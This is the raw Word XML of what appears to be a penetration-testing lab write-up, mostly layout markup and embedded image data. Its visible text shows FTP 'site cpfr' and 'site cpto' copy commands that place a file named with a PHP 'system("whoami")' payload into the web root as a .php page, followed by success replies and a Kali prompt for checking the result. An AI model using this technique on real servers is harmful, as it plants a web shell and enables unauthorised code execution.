                  <wp:docPr id="227088" name="Picture 2270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088" name="Picture 227088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A8D003" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
              </w:rPr>
              <w:t>350 File or directory exists, ready for destination name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4740EB51" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="40"/>
              <w:ind w:left="1830"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C9F5F41" wp14:editId="191617C2">
                  <wp:extent cx="3409950" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340814" name="Picture 3408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814" name="Picture 340814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904F4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">site cpto /tmp/&lt;?php system("whoami") ? </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9A2A77" wp14:editId="585C11E3">
                  <wp:extent cx="123825" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226138" name="Picture 2261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138" name="Picture 226138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4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2"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3F24BF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="22"/>
              <w:ind w:left="11595"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2718A4" wp14:editId="79E929FC">
                  <wp:extent cx="1638300" cy="38100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227203" name="Picture 2272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203" name="Picture 227203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71A32F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="8948"/>
                <w:tab w:val="center" w:pos="12885"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pP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0" wp14:anchorId="00FCA3A9" wp14:editId="771F284A">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>7443788</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>338248</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1638300" cy="142875"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="227068" name="Picture 2270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068" name="Picture 227068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48"/>
              </w:rPr>
              <w:t>250 Copy successful</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01598AEF" wp14:editId="6333AEFD">
                  <wp:extent cx="1285875" cy="295275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227140" name="Picture 2271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140" name="Picture 227140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8"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50CD1AA5" wp14:editId="6783FF1C">
                  <wp:extent cx="1362075" cy="295275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227153" name="Picture 2271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153" name="Picture 227153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8"/>
              </w:rPr>
              <w:tab/>
              <w:t>Success!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="0F8AE02B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1847"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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5B1D7360" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="right" w:pos="15195"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="4DDEC6D6" wp14:editId="767EEEA2">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>566738</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>225985</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="114300" cy="19050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226169" name="Picture 2261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169" name="Picture 226169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10464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="7E95B675" wp14:editId="50859F36">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>3805238</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>225985</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="762000" cy="28575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="340816" name="Picture 3408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816" name="Picture 340816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42"/>
              </w:rPr>
              <w:t xml:space="preserve">site cpfr /tmp/&lt;?php system("whoami") ? </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3139CC6F" wp14:editId="116494CB">
                  <wp:extent cx="123825" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226131" name="Picture 2261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131" name="Picture 226131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4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2"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AACFABF" wp14:editId="391C6AC5">
                  <wp:extent cx="1362075" cy="219075"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227097" name="Picture 2270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097" name="Picture 227097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2"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1238EB4D" wp14:editId="2CA79362">
                  <wp:extent cx="2286000" cy="238125"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227180" name="Picture 2271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180" name="Picture 227180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E01926" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="15" w:right="3450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0" wp14:anchorId="33CDE919" wp14:editId="7D743D65">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>566738</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>513488</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="133350" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226216" name="Picture 2262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216" name="Picture 226216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44"/>
              </w:rPr>
              <w:t xml:space="preserve">350 File </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F64394F" wp14:editId="72F78202">
                  <wp:extent cx="142875" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226436" name="Picture 2264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436" name="Picture 226436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4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4"/>
              </w:rPr>
              <w:t xml:space="preserve">or directory exists, ready for destination </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C437FBD" wp14:editId="6488369F">
                  <wp:extent cx="9525" cy="47625"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="226257" name="Picture 2262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257" name="Picture 226257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" cy="4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4"/>
              </w:rPr>
              <w:t xml:space="preserve">name site cpto /var/www/html/anything. php </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A45E1B" wp14:editId="34BB24AD">
                  <wp:extent cx="1362075" cy="276225"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227121" name="Picture 2271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121" name="Picture 227121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31702B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
              </w:rPr>
              <w:t>250 Copy successful</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EA8DF49" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="55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A7AC5C9" wp14:editId="230267B1">
                      <wp:extent cx="809625" cy="28575"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="341357" name="Group 3413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09625" cy="28575"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="809625" cy="285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6276" name="Picture 226276"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId1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3350" cy="28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6507" name="Picture 226507"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId1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09600" y="0"/>
                                  <a:ext cx="200025" cy="28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41357" style="width:63.75pt;height:2.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="8096,285">
                      <v:shape id="Picture 226276" style="position:absolute;width:1333;height:285;left:0;top:0;" filled="f">
                        <v:imagedata r:id="rId165"/>
                      </v:shape>
                      <v:shape id="Picture 226507" style="position:absolute;width:2000;height:285;left:6096;top:0;" filled="f">
                        <v:imagedata r:id="rId166"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DC693A2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="5535" w:hanging="10"/>
        <w:jc w:val="right"/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0" wp14:anchorId="2E50C991" wp14:editId="6C519877">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>238125</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3552825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="11039475" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340818" name="Picture 340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18" name="Picture 340818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10394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152F070" wp14:editId="35DEBF0C">
            <wp:extent cx="85725" cy="76200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="227292" name="Picture 227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92" name="Picture 227292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</w:rPr>
        <w:t xml:space="preserve"> Trying these commands yields much better results.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A88AB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="28"/>
        <w:ind w:left="400" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We can verify the results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9C14A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="3D53F857" wp14:editId="596AF84C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11734800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5676900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="236097" name="Picture 2360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97" name="Picture 236097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4560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="77C45B84" wp14:editId="42F7C3F9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11649075</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5695950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="19050" cy="28575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="236098" name="Picture 2360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98" name="Picture 236098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0" wp14:anchorId="36260C63" wp14:editId="6CB5FF23">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11658600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5753100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="236100" name="Picture 236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00" name="Picture 236100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As before, we can access the site with Python and the requests module.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16538" w:type="dxa"/>
        <w:tblInd w:w="240" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="41" w:type="dxa"/>
          <w:left w:w="165" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="68" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16538"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="1F7DDDDB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3364"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16538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2279246D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="3225"/>
              </w:tabs>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:tab/>
              <w:t>python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C773CB2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="189"/>
              <w:ind w:left="15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6608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D09E55E" wp14:editId="1FB1002C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>133350</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-305895</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="10325100" cy="828675"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="338300" name="Group 3383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325100" cy="828675"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="10325100" cy="8286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40821" name="Picture 340821"/>
                                <pic:cNvPicPr/>
                              </pic:nvPicPr>
                              <pic:blipFill>
                                <a:blip r:embed="rId1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57200" y="0"/>
                                  <a:ext cx="9867900" cy="828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27542" name="Rectangle 227542"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="590550"/>
                                  <a:ext cx="769770" cy="27870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58D3902" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
                                    <w:r>
                                      <w:rPr>
                                        <w:sz w:val="38"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">[GCC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09E55E" id="Group 338300" o:spid="_x0000_s1061" style="position:absolute;left:0;text-align:left;margin-left:10.5pt;margin-top:-24.1pt;width:813pt;height:65.25pt;z-index:-251599872;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" coordsize="103251,828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KdRNpzwIAAMkGAAAOAAAAZHJzL2Uyb0RvYy54bWycVW1v2yAQ/j5p&#10;/wHxvbXjNHViNammda0qTWvUbj+AYGyjYUBA3vbrd4ftpGs6deuHOMcBd88998LV9a5VZCOcl0bP&#10;6eg8pURobkqp6zn98f32bEqJD0yXTBkt5nQvPL1efPxwtbWFyExjVCkcASPaF1s7p00ItkgSzxvR&#10;Mn9urNCwWRnXsgBLVyelY1uw3qokS9PLZGtcaZ3hwnvQ3nSbdBHtV5Xg4aGqvAhEzSlgC/Hr4neF&#10;32RxxYraMdtI3sNg70DRMqnB6cHUDQuMrJ08MdVK7ow3VTjnpk1MVUkuYgwQzSh9Ec2dM2sbY6mL&#10;bW0PNAG1L3h6t1n+bbN0RJZzOh5PxylQpFkLeYquSa8Dkra2LuDsnbNPdul6Rd2tMO5d5Vr8h4jI&#10;LtK7P9ArdoFwUI7ScTYZoQ8Om9NseplPugTwBrJ0co83X964mQyOE8R3gGMlL+DX8wXSCV9v1xXc&#10;CmsnaG+k/ScbLXM/1/YMUmtZkCupZNjHMoUkIii9WUq+dN3iGfUX6TQbDdTDEfRMxp0WuMareBrv&#10;wjLB9R+mVkraW6kUZgDlHjTU+Ys6eSXurgZvDF+3QoeuqZxQgN9o30jrKXGFaFcCasTdl6MuYz44&#10;EXiDDitw/AiNhshYcdiIKI/AELOH0nmlWC4mObQyJacVM4MSmZ0WzCHtrLDOhzthWoICAAQcwDUr&#10;2Oar7xENR3riOhARHWDCyobJ4wfKYHVC2n8111PDrAAIaPaY4SzLJxfZkGFki+laCdLrYz/F84fu&#10;8n9jqyNqMksnk358Df2VX87yvO+uLJ/maYa5ei9ZrFAamdQGK6szhBpotQEbSmG32sX5kcVeRtXK&#10;lHsYKo1xvx7gaaiU2c6p6SWKrwVkCncpUfca+AbMYRDcIKwGwQX12cTx3cH5tA6mkjG5R289Lkhk&#10;lOK8jLH3sx0H8vN1PHV8gRa/AQAA//8DAFBLAwQKAAAAAAAAACEA01MaFH04AAB9OAAAFAAAAGRy&#10;cy9tZWRpYS9pbWFnZTEuanBn/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwME&#10;BQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQME&#10;BAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBT/wAARCABXBA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PW9Q1zRbee6j1O5miX7VaavAsMRcXSiBQIw&#10;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2H4LfshfF/9obS7rU/AHgi713TLZ/KkvnuILSAuMZRZJ5E&#10;V2GRkKSRkZrntW+APxB8P/Fiy+GmqeF7zTPG97cx2ltpV4UhM0kjbYykjMIyjHo4bYfWvoz9syLU&#10;7f8AZk/Zkj8PR3SfDc+F1kdrUn7GdZZybrzNp2+du343c8yY/ir17xDJqy+Pv2CoPGnnH4iK0T6h&#10;9ucm8Fmb6P